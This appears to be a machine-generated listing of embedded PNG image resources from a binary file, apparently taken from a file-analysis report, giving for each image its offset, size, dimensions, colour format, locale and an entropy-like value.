                                                                                                                                                                                                                                                                                                                                                                                        PNG0x369ed00x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36a2600x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36a5780x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36a4c80xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36a6980x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x369cc00x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b1600xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36c7200xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36c5d00x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36ae700xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36af200x89PNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36afb00x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b0480x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b0e00x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3816e00xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3816200xbcPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159574468085106
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37c5d80xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3740180x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x375e000x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x375fc00x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3811e00x440PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010110294117647
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d4680x12ePNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0298013245033113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37aa700x5b1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0075497597803706
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37b0280x408PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0106589147286822
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37bca80x471PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009674582233949
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37c1200x4b7PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091135045567523
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37b4300x481PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0095403295750216
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37b8b80x3ecPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0109561752988048
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36e1300x452PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0099457504520795
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36e9280x414PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36e5880x39ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011879049676026
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36ed400x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3722900x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3724480xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3725380x1ae0PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0015988372093023
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x376ef00xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x377a380x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3780480x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3798f80x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36fca00x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36f1d00xacbPNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039811798769454
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3818300xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3823f80xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37e2400x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37dca80x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d6b00x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d2300x237PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194003527336861
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37e8200x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3765000x4b6PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091210613598673
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3769b80x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36c7c80x5fePNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071707953063884
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36cdc80xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36dba00x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38ea080x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3913c80x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3910300x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38fdd00x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38bbf00x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38e6980x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38e2c80x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38cfa80x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3917480x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3941300x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x393d700x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x392af80x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3863000x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x388c800x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3889280x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3876a00x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3830280x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3832400x2e4PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148648648648648
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3836000x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x385f980x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x385c200x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3849b00x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3835280xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3944980x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x396f300x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x396b380x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3958300x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3890000x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38b8780x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38b5380x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38a3980x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3817880xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36df180x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36dc200x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d0480x16ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.030054644808743
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d1b80x73PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9826086956521739
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d5980x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37cfe00x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3803b00xcePNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0242718446601942
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3807a00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3804800x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3807080x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37fa400x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37f0a00x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37eda80x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x367ff80x1ffPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0215264187866928
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3681f80x1f7PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021868787276342
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3684880xb6PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.010989010989011
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3683f00x94PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0135135135135136
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3685400x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3689280x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x368d100x315PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0139416983523448
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3690280x259PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0183028286189684
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3694880x205PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0212765957446808
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3696900x176PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3692880x124PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136986301369864
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3693b00xd7PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3698080x28fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.016793893129771
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x369a980x225PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0200364298724955
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b6d00xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36c4a80x123PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0378006872852235
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b3600x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b2d80x83PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0076335877862594
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36ac580x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36a7c80x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39f3380x261PNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0180623973727423
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39f1200x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39bd500x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9931350114416476
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c0280x293PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0166919575113809
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39bf080x11aPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9716312056737588
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39ec400xdePNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.027027027027027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39dd580x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39e0e80x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39e4000x124PNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0308219178082192
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39e3500xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39e5280x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39db480x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39f0280xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a07a00x9fPNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0125786163522013
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a06580x148PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0335365853658536
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39ed200xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39edd00x8bPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.014388489208633
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39ee600xa4PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39ef080x94PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0067567567567568
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39efa00x87PNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b5de80xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b5d200xc5PNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203045685279188
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b0b400xa54PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004160363086233
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a83f00x1edaPNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001392757660167
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3aa2d00x1cbPNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0239651416122004
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3aa4a00x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b58280x4f3PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0086819258089976
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b1a480x11aPNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024822695035461
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3aeff00x5afPNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0075601374570446
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3af5a00x3ffPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010752688172043
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b02080x461PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0098126672613739
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b06700x4ccPNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008957654723127
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3af9a00x474PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0096491228070175
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3afe180x3efPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0109235352532273
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a23c80x44aPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0100182149362478
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a2bb80x41fPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0104265402843602
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a28180x39bPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119176598049837
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a2fd80x4a1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009282700421941
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a65380x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a66f00xf9PNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.036144578313253
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a67f00x1bfaPNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001535883831332
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ab4700xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3abfb80x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ac5c80x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ade780x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a3f480x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a34800xac7PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039869517941282
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b5f480xa82PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004089219330855
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b69d00xac7PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039869517941282
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b27f00x5d3PNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073775989268947
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b22780x575PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078740157480315
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b1c880x5eaPNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0072655217965654
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b18200x222PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.02014652014652
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b2dc80x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3aa9e00x552PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0080763582966226
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3aaf380x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a08400x624PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006997455470738
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a0e680xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a1dd80x98PNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.013157894736842
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c15580x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c38a80x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
